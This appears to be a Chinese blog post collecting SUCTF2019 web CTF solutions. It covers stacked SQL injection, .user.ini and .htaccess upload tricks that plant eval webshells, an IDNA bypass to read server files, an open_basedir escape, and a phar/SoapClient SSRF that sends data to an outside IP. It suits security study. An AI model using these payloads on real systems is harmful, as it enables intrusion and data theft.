主頁 >  其他 > 到處抄來的SUCTF2019 web wp

到處抄來的SUCTF2019 web wp

2020-10-17 10:43:58 其他


0x01 EasySQL

 

 

 

這是一個考察堆疊注入的題目,但是這道題因為作者的過濾不夠完全所以存在非預期解

非預期解

直接構造 *,1 這樣構造,最后拼接的查詢陳述句就變成了 select *,1||flag from Flag,可以直接得到當前表中的全部內容,就能夠直接獲得flag

 

 

 

正常解題

堆疊注入,先構造 1;show tables;#可以得到當前的表資訊

 

 

 

并且根據回顯,我們可以大致判斷查詢陳述句為: ... POST['query']||flag ...

直接構造 1;select * from Flag;# 出現Nonono, 可以知道存在過濾,過濾了flag

 

 

 

 

這時候,通過堆疊注入,設定 sql_mode 的值為 PIPES_AS_CONCAT,從而將 || 視為字串的連接運算子而非或運算子,所以構造出來的payload為:1;set sql_mode=PIPES_AS_CONCAT;select 1

得到flag

 

 

 

0x02 CheckIn

上傳檔案的時候發現,上傳擴展名為aaa的檔案,回顯&lt;? in contents!,說明檔案的內容不能包含<?,可以知道上傳的時候是黑名單過濾,直接把檔案的尾綴改為jpg,回顯exif_imagetype:not image!

猜測后端應該呼叫了php的exif_imagetype()函式,這個很好繞過,添加圖片檔案頭就可以了,我這里添加的是GIF89a,上傳成功一個檔案之后,在回顯中,發現上傳目錄中存在index.php檔案

 

 

 

這里就可以知道需要用到.user.ini檔案了,先上傳一個.user.ini檔案,上傳檔案內容為

GIF89a
auto_prepend_file="test.png"

通過auto_prepend_file指定需要包含的檔案,這里我包含了一個test.png

 

 

 

 

接著在上傳需要包含進去的test.png檔案,檔案內容為:

GIF89a
<script language="php">eval($_POST['five'])</script>

 

 

 

 

這時候,其實就把test.png檔案里面的一句話包含進了上傳檔案目錄里的index.php檔案中,可以直接在index.php中執行一句話,蟻劍連上,可以在檔案中找到flag,讀取就好

 

 

 

貼一篇優秀的文章

https://wooyun.js.org/drops/user.ini%E6%96%87%E4%BB%B6%E6%9E%84%E6%88%90%E7%9A%84PHP%E5%90%8E%E9%97%A8.html

0x03 Pythonginx

進入頁面后給了原始碼:

@app.route('/getUrl', methods=['GET', 'POST'])
?
def getUrl():
?
url = request.args.get("url")
?
host = parse.urlparse(url).hostname
?
if host == 'suctf.cc':
?
  return "我扌 your problem? 111"
?
parts = list(urlsplit(url))
?
host = parts[1]
?
if host == 'suctf.cc':
?
  return "我扌 your problem? 222 " + host
?
newhost = []
?
for h in host.split('.'):
?
  newhost.append(h.encode('idna').decode('utf-8'))
?
parts[1] = '.'.join(newhost)
?
\#去掉 url 中的空格
?
finalUrl = urlunsplit(parts).split(' ')[0]
?
host = parse.urlparse(finalUrl).hostname
?
if host == 'suctf.cc':
?
  return urllib.request.urlopen(finalUrl).read()
?
else:
?
  return "我扌 your problem? 333"
?
<!-- Dont worry about the suctf.cc. Go on! -->
?
<!-- Do you know the nginx? -->

 

這題的出題思路來自于今年BlackHat的一個議題,相關PPT如下:

https://i.blackhat.com/USA-19/Thursday/us-19-Birch-HostSplit-Exploitable-Antipatterns-In-Unicode-Normalization.pdf

 

其中關于Python的內容如下:

 

 

 

大佬寫的一個腳本,用來尋找可用字符:

\# coding:utf-8 
?
for i in range(128,65537):  
?
tmp=chr(i)  
?
try:    
?
  res = tmp.encode('idna').decode('utf-8')    
?
  if("-") in res:      
?
    continue    
?
  print("U:{} A:{}   ascii:{} ".format(tmp, res, i))  
?
except:    
?
  pass

 

下面就是尋找利用方式了,根據題目中的提示:

前面的url部分應該是suctf.cc

還提到了Nginx,Nginx的組態檔目錄為:/usr/local/nginx/conf/nginx.conf

跑上述腳本的的時候,其中有一個可利用字符:

 

由此可以想到構造:file://suctf.c?sr/local/nginx/conf/nginx.conf(另一種繞過方式是利用?來代替c及進行繞過),這樣可以讀到flag的位置:

 

 

最后構造payload:file://suctf.c?sr/fffffflag

 

 

0x04 EasyWeb

題目頁面給了原始碼

<?php
function get_the_flag(){
?
// webadmin will remove your upload file every 20 min!!!!
?
$userdir = "upload/tmp_".md5($_SERVER['REMOTE_ADDR']);
?
if(!file_exists($userdir)){
?
mkdir($userdir);
?
}
?
if(!empty($_FILES["file"])){
?
  $tmp_name = $_FILES["file"]["tmp_name"];
?
  $name = $_FILES["file"]["name"];
?
  $extension = substr($name, strrpos($name,".")+1);
?
if(preg_match("/ph/i",$extension)) die("^_^");
?
  if(mb_strpos(file_get_contents($tmp_name), '<?')!==False) die("^_^");
?
if(!exif_imagetype($tmp_name)) die("^_^");
?
  $path= $userdir."/".$name;
?
  @move_uploaded_file($tmp_name, $path);
?
  print_r($path);
?
}
?
}
?
$hhh = @$_GET['_'];
?
if (!$hhh){
?
highlight_file(__FILE__);
?
}
?
if(strlen($hhh)>18){
?
die('One inch long, one inch strong!');
?
}
?
?
if ( preg_match('/[\x00- 0-9A-Za-z\'"\`~_&.,|=[\x7F]+/i', $hhh) )
?
die('Try something else!');
?
$character_type = count_chars($hhh, 3);
?
if(strlen($character_type)>12) die("Almost there!");
?
eval($hhh);
?>

代碼分為兩部分,上面是get_the_flag()函式,應該是一個檔案上傳功能的驗證函式,下面是通過 _ 傳參進去,如果能通過一系列的檢驗則可以執行eval()函式,如果這題是考RCE的話,為什么還要給出檔案上傳的代,再看那些過濾,幾乎很難去繞過,于是考慮呼叫get_the_flag()函式來看看可不可以通過檔案上傳功能

所以接下來要構造payload繞過正則檢測并且呼叫get_the_flag() ,這里的過濾非常嚴格,幾乎過濾了所有可見字符,可以看下這篇文章 https://www.leavesongs.com/penetration/webshell-without-alphanum.html

就可以知道如何來繞過了,這里可以利用不可見字符的異或來構造,腳本如下

<?php
?
$payload = '';
?
for($i=0;$i<strlen($argv[1]);$i++)
{  
for($j=0;$j<255;$j++)
?
{
?
  $k = chr($j)^chr(255);
?
  if($k == $argv[1][$i])
?
    $payload .= '%'.dechex($j);
?
}
?
}
?
echo $payload;

可以得到

 

 

所以嘗試構造payload:

${%ff%ff%ff%ff^%a0%b8%ba%ab}{%ff}();&%ff=phpinfo

 

 

 

構造成功,于是構造payload:

${%ff%ff%ff%ff^%a0%b8%ba%ab}{%ff}();&%ff=get_the_flag

接下來就是通過上傳來getshell了,這里確實是需要上傳.htaccess檔案了,繞過方式可以參考這篇文章:

https://www.cnblogs.com/wfzWebSecuity/p/11207145.html

exif_imagetype() 的繞過方式和上面一樣

這里注意到php版本為7.2所以,不能用<script>標簽繞過<?的過濾了,可以通過編碼進行繞過,如原來使用utf8編碼,如果shell中是用utf16編碼則可以Bypass

 

 

直接利用腳本生成檔案:

SIZE_HEADER = b"\n\n#define width 1337\n#define height 1337\n\n"


def generate_php_file(filename, script):

phpfile = open(filename, 'wb') 

phpfile.write(script.encode('utf-16be'))

phpfile.write(SIZE_HEADER)

phpfile.close()

def generate_htacess():

htaccess = open('.htaccess', 'wb')

htaccess.write(SIZE_HEADER)

htaccess.write(b'AddType application/x-httpd-php .lethe\n')

htaccess.write(b'php_value zend.multibyte 1\n')

htaccess.write(b'php_value zend.detect_unicode 1\n')

htaccess.write(b'php_value display_errors 1\n') 

htaccess.close() 

generate_htacess()

generate_php_file("shell.lethe", "<?php eval($_GET['cmd']); die(); ?>")

然后利用Postman分別構造上傳.htaccessshell.lethe:

 

 

 

 

得到了檔案路徑 upload/tmp_f4e7685fe689f675c85caeefaedcf40c/shell.lethe

利用shell.lethe執行命令了,但是還需要繞過open_basedir

參考:從PHP底層看open_basedir bypass

https://skysec.top/2019/04/12/%E4%BB%8EPHP%E5%BA%95%E5%B1%82%E7%9C%8Bopen-basedir-bypass/#ini-set覆寫問題探索

于是構造payload如下:

?cmd=chdir('/tmp');mkdir('lethe');chdir('lethe');ini_set('open_basedir','..');chdir('..');chdir('..');chdir('..');chdir('..');ini_set('open_basedir','/');var_dump(ini_get('open_basedir'));var_dump(glob('*'));

 

 

得到flag位置后,最后讀取flag即可,payload:

?cmd=chdir('/tmp');mkdir('lethe');chdir('lethe');ini_set('open_basedir','..');chdir('..');chdir('..');chdir('..');chdir('..');ini_set('open_basedir','/');var_dump(ini_get('open_basedir'));var_dump(file_get_contents(THis_Is_tHe_F14g));

 

 

0x05 Upload Lab 2

題目給了原始碼,所以就是進行代碼審計

class Ad{
   ......
   function __destruct(){
     getFlag($this->ip, $this->port);
     //使用你自己的服務器監聽一個確保可以收到訊息的埠來獲取flag
   }
 }

if($_SERVER['REMOTE_ADDR'] == '127.0.0.1'){
   if(isset($_POST['admin'])){
     
     $ip = $_POST['ip'];   //你用來獲取flag的服務器ip
     $port = $_POST['port']; //你用來獲取flag的服務器埠

$clazz = $_POST['clazz'];
     $func1 = $_POST['func1'];
     $func2 = $_POST['func2'];
     $func3 = $_POST['func3'];
     $arg1 = $_POST['arg1'];
     $arg2 = $_POST['arg2'];
     $arg2 = $_POST['arg3'];
     $admin = new Ad($ip, $port, $clazz, $func1, $func2, $func3, $arg1, $arg2, $arg3);
     $admin->check();
   }
 }
 ......

 

也就是說需要通過SSRF來反序列化觸發getFlag函式,所以繼續查看代碼

#class.php

......
   function getMIME(){
     $finfo = finfo_open(FILEINFO_MIME_TYPE);
     $this->type = finfo_file($finfo, $this->file_name);
     finfo_close($finfo);
   }
 ......

 

參考zsx的文章:https://blog.zsxsoft.com/post/38,查看finfo_file的底層代碼

 

 

闊以發現finfo_file也呼叫了,所以finfo_file也是能夠觸發phar反序列化的,那么就可以利用SoapClient來通過SSRF以POST方式訪問到admin.php檔案,不過在func.php中又做了限制

<?php
 include 'class.php';

if (isset($_POST["submit"]) && isset($_POST["url"])) {
   if(preg_match('/^(ftp|zlib|data|glob|phar|ssh2|compress.bzip2|compress.zlib|rar|ogg|expect)(.|\\s)*|(.|\\s)*(file|data|\.\.)(.|\\s)*/i',$_POST['url'])){
     die("Go away!");
   }else{
     $file_path = $_POST['url'];
     $file = new File($file_path);
     $file->getMIME();
     echo "<p>Your file type is '$file' </p>";
   }
 }

 

phar協議不能出現在開頭,還是zxs那篇文章里寫的

也就是說闊以構造繞過一下來呼叫phar協議,這里的吹一下altman(https://altman.vip/),fuzz到一個可以利用的方法php://filter/resource=phar://

所以接下來就是生成一個phar腳本,上傳后通過func觸發就好了

<?php

class File{

public $file_name;
   public $type;
   public $func = "SoapClient";

function __construct(){
     $this->file_name = array(null, array('location' => "http://127.0.0.1/admin.php", 'uri' => "c", 'user_agent' => "catcat\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 133\r\n\r\nip=72.19.12.57&port=1234&admin=1&clazz=ArrayIterator&func1=append&func2=append&func3=append&arg1=1&arg2=1&arg3=1\r\n\r\n\r\n"));
   }

}

$o = new File();
 $phar=new Phar('poc.phar');
 $phar->startBuffering();
 $phar->setStub("GIF89a< ?php __HALT_COMPILER(); ?>");
 $phar->setMetadata($o);
 $phar->addFromString("foo.txt","bar");
 $phar->stopBuffering();

 

我自己在運行腳本的時候,出現了錯誤提示

 

 

需要把phar.readonly設定為Off

 

 

然后改個后綴上傳,我這里改成了jpg,

 

 

 

vps上監聽一下埠,到func.php觸發就可以了

問題來了~~~,我監聽不到,不知道是什么問題,感覺可能是國外的IP,不能訪問???

迷惑,有時間再看吧,咕咕咕~~~

 

 

沒看懂,只能把網上大佬的wp搬過來了~~~

再加上點其他大佬的鏈接

https://byqiyou.github.io/2019/08/20/SUCTF2019-WEB-WP/

轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/175733.html

標籤:其他

上一篇:滲透測驗學習 二十三、常見cms拿shell

下一篇:三次握手四次揮手

標籤雲
其他(157675) Python(38076) JavaScript(25376) Java(17977) C(15215) 區塊鏈(8255) C#(7972) AI(7469) 爪哇(7425) MySQL(7132) html(6777) 基礎類(6313) sql(6102) 熊猫(6058) PHP(5869) 数组(5741) R(5409) Linux(5327) 反应(5209) 腳本語言(PerlPython)(5129) 非技術區(4971) Android(4554) 数据框(4311) css(4259) 节点.js(4032) C語言(3288) json(3245) 列表(3129) 扑(3119) C++語言(3117) 安卓(2998) 打字稿(2995) VBA(2789) Java相關(2746) 疑難問題(2699) 细绳(2522) 單片機工控(2479) iOS(2429) ASP.NET(2402) MongoDB(2323) 麻木的(2285) 正则表达式(2254) 字典(2211) 循环(2198) 迅速(2185) 擅长(2169) 镖(2155) 功能(1967) .NET技术(1958) Web開發(1951) python-3.x(1918) HtmlCss(1915) 弹簧靴(1913) C++(1909) xml(1889) PostgreSQL(1872) .NETCore(1853) 谷歌表格(1846) Unity3D(1843) for循环(1842)

熱門瀏覽
  • 網閘典型架構簡述

    網閘架構一般分為兩種:三主機的三系統架構網閘和雙主機的2+1架構網閘。 三主機架構分別為內端機、外端機和仲裁機。三機無論從軟體和硬體上均各自獨立。首先從硬體上來看,三機都用各自獨立的主板、記憶體及存盤設備。從軟體上來看,三機有各自獨立的作業系統。這樣能達到完全的三機獨立。對于“2+1”系統,“2”分為 ......

    uj5u.com 2020-09-10 02:00:44 more
  • 如何從xshell上傳檔案到centos linux虛擬機里

    如何從xshell上傳檔案到centos linux虛擬機里及:虛擬機CentOs下執行 yum -y install lrzsz命令,出現錯誤:鏡像無法找到軟體包 前言 一、安裝lrzsz步驟 二、上傳檔案 三、遇到的問題及解決方案 總結 前言 提示:其實很簡單,往虛擬機上安裝一個上傳檔案的工具 ......

    uj5u.com 2020-09-10 02:00:47 more
  • 一、SQLMAP入門

    一、SQLMAP入門 1、判斷是否存在注入 sqlmap.py -u 網址/id=1 id=1不可缺少。當注入點后面的引數大于兩個時。需要加雙引號, sqlmap.py -u "網址/id=1&uid=1" 2、判斷文本中的請求是否存在注入 從文本中加載http請求,SQLMAP可以從一個文本檔案中 ......

    uj5u.com 2020-09-10 02:00:50 more
  • Metasploit 簡單使用教程

    metasploit 簡單使用教程 浩先生, 2020-08-28 16:18:25 分類專欄: kail 網路安全 linux 文章標簽: linux資訊安全 編輯 著作權 metasploit 使用教程 前言 一、Metasploit是什么? 二、準備作業 三、具體步驟 前言 Msfconsole ......

    uj5u.com 2020-09-10 02:00:53 more
  • 游戲逆向之驅動層與用戶層通訊

    驅動層代碼: #pragma once #include <ntifs.h> #define add_code CTL_CODE(FILE_DEVICE_UNKNOWN,0x800,METHOD_BUFFERED,FILE_ANY_ACCESS) /* 更多游戲逆向視頻www.yxfzedu.com ......

    uj5u.com 2020-09-10 02:00:56 more
  • 北斗電力時鐘(北斗授時服務器)讓網路資料更精準

    北斗電力時鐘(北斗授時服務器)讓網路資料更精準 北斗電力時鐘(北斗授時服務器)讓網路資料更精準 京準電子科技官微——ahjzsz 近幾年,資訊技術的得了快速發展,互聯網在逐漸普及,其在人們生活和生產中都得到了廣泛應用,并且取得了不錯的應用效果。計算機網路資訊在電力系統中的應用,一方面使電力系統的運行 ......

    uj5u.com 2020-09-10 02:01:03 more
  • 【CTF】CTFHub 技能樹 彩蛋 writeup

    ?碎碎念 CTFHub:https://www.ctfhub.com/ 筆者入門CTF時時剛開始刷的是bugku的舊平臺,后來才有了CTFHub。 感覺不論是網頁UI設計,還是題目質量,賽事跟蹤,工具軟體都做得很不錯。 而且因為獨到的金幣制度的確讓人有一種想去刷題賺金幣的感覺。 個人還是非常喜歡這個 ......

    uj5u.com 2020-09-10 02:04:05 more
  • 02windows基礎操作

    我學到了一下幾點 Windows系統目錄結構與滲透的作用 常見Windows的服務詳解 Windows埠詳解 常用的Windows注冊表詳解 hacker DOS命令詳解(net user / type /md /rd/ dir /cd /net use copy、批處理 等) 利用dos命令制作 ......

    uj5u.com 2020-09-10 02:04:18 more
  • 03.Linux基礎操作

    我學到了以下幾點 01Linux系統介紹02系統安裝,密碼啊破解03Linux常用命令04LAMP 01LINUX windows: win03 8 12 16 19 配置不繁瑣 Linux:redhat,centos(紅帽社區版),Ubuntu server,suse unix:金融機構,證券,銀 ......

    uj5u.com 2020-09-10 02:04:30 more
  • 05HTML

    01HTML介紹 02頭部標簽講解03基礎標簽講解04表單標簽講解 HTML前段語言 js1.了解代碼2.根據代碼 懂得挖掘漏洞 (POST注入/XSS漏洞上傳)3.黑帽seo 白帽seo 客戶網站被黑帽植入劫持代碼如何處理4.熟悉html表單 <html><head><title>TDK標題,描述 ......

    uj5u.com 2020-09-10 02:04:36 more
最新发布
  • 2023年最新微信小程式抓包教程

    01 開門見山 隔一個月發一篇文章,不過分。 首先回顧一下《微信系結手機號資料庫被脫庫事件》,我也是第一時間得知了這個訊息,然后跟蹤了整件事情的經過。下面是這起事件的相關截圖以及近日流出的一萬條資料樣本: 個人認為這件事也沒什么,還不如關注一下之前45億快遞資料查詢渠道疑似在近日復活的訊息。 訊息是 ......

    uj5u.com 2023-04-20 08:48:24 more
  • web3 產品介紹:metamask 錢包 使用最多的瀏覽器插件錢包

    Metamask錢包是一種基于區塊鏈技術的數字貨幣錢包,它允許用戶在安全、便捷的環境下管理自己的加密資產。Metamask錢包是以太坊生態系統中最流行的錢包之一,它具有易于使用、安全性高和功能強大等優點。 本文將詳細介紹Metamask錢包的功能和使用方法。 一、 Metamask錢包的功能 數字資 ......

    uj5u.com 2023-04-20 08:47:46 more
  • vulnhub_Earth

    前言 靶機地址->>>vulnhub_Earth 攻擊機ip:192.168.20.121 靶機ip:192.168.20.122 參考文章 https://www.cnblogs.com/Jing-X/archive/2022/04/03/16097695.html https://www.cnb ......

    uj5u.com 2023-04-20 07:46:20 more
  • 從4k到42k,軟體測驗工程師的漲薪史,給我看哭了

    清明節一過,盲猜大家已經無心上班,在數著日子準備過五一,但一想到銀行卡里的余額……瞬間心情就不美麗了。最近,2023年高校畢業生就業調查顯示,本科畢業月平均起薪為5825元。調查一出,便有很多同學表示自己又被平均了。看著這一資料,不免讓人想到前不久中國青年報的一項調查:近六成大學生認為畢業10年內會 ......

    uj5u.com 2023-04-20 07:44:00 more
  • 最新版本 Stable Diffusion 開源 AI 繪畫工具之中文自動提詞篇

    🎈 標簽生成器 由于輸入正向提示詞 prompt 和反向提示詞 negative prompt 都是使用英文,所以對學習母語的我們非常不友好 使用網址:https://tinygeeker.github.io/p/ai-prompt-generator 這個網址是為了讓大家在使用 AI 繪畫的時候 ......

    uj5u.com 2023-04-20 07:43:36 more
  • 漫談前端自動化測驗演進之路及測驗工具分析

    隨著前端技術的不斷發展和應用程式的日益復雜,前端自動化測驗也在不斷演進。隨著 Web 應用程式變得越來越復雜,自動化測驗的需求也越來越高。如今,自動化測驗已經成為 Web 應用程式開發程序中不可或缺的一部分,它們可以幫助開發人員更快地發現和修復錯誤,提高應用程式的性能和可靠性。 ......

    uj5u.com 2023-04-20 07:43:16 more
  • CANN開發實踐:4個DVPP記憶體問題的典型案例解讀

    摘要:由于DVPP媒體資料處理功能對存放輸入、輸出資料的記憶體有更高的要求(例如,記憶體首地址128位元組對齊),因此需呼叫專用的記憶體申請介面,那么本期就分享幾個關于DVPP記憶體問題的典型案例,并給出原因分析及解決方法。 本文分享自華為云社區《FAQ_DVPP記憶體問題案例》,作者:昇騰CANN。 DVPP ......

    uj5u.com 2023-04-20 07:43:03 more
  • msf學習

    msf學習 以kali自帶的msf為例 一、msf核心模塊與功能 msf模塊都放在/usr/share/metasploit-framework/modules目錄下 1、auxiliary 輔助模塊,輔助滲透(埠掃描、登錄密碼爆破、漏洞驗證等) 2、encoders 編碼器模塊,主要包含各種編碼 ......

    uj5u.com 2023-04-20 07:42:59 more
  • Halcon軟體安裝與界面簡介

    1. 下載Halcon17版本到到本地 2. 雙擊安裝包后 3. 步驟如下 1.2 Halcon軟體安裝 界面分為四大塊 1. Halcon的五個助手 1) 影像采集助手:與相機連接,設定相機引數,采集影像 2) 標定助手:九點標定或是其它的標定,生成標定檔案及內參外參,可以將像素單位轉換為長度單位 ......

    uj5u.com 2023-04-20 07:42:17 more
  • 在MacOS下使用Unity3D開發游戲

    第一次發博客,先發一下我的游戲開發環境吧。 去年2月份買了一臺MacBookPro2021 M1pro(以下簡稱mbp),這一年來一直在用mbp開發游戲。我大致分享一下我的開發工具以及使用體驗。 1、Unity 官網鏈接: https://unity.cn/releases 我一般使用的Apple ......

    uj5u.com 2023-04-20 07:40:19 more